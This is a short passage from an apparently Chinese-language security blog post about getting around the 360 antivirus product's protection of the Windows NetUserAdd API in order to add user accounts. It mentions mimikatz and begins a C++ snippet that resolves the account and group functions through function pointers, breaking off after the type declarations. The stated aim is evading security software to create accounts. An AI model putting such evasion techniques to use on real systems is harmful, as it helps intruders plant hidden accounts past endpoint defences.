虽然360对使用netuseradd 的api进行了一定的防护,但是做一下修改还是可以过的,甚至于我们可以尝试调用更加底层的api。
mimikaz是真的强,还是还看源码才行。。。
使用这个大哥写的工具测试的:添加链接描述
Netuseradd稍稍修改一下:
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <Windows.h>
#include <LM.h>
#include <iostream>
#ifndef UNICODE
#define UNICODE
#endif
typedef int(WINAPI* add)(LMSTR servername, DWORD level, LPBYTE buf, LPDWORD parm_err);
typedef int(WINAPI* NGA)(LPCWSTR servername,LPCWSTR groupname, DWORD level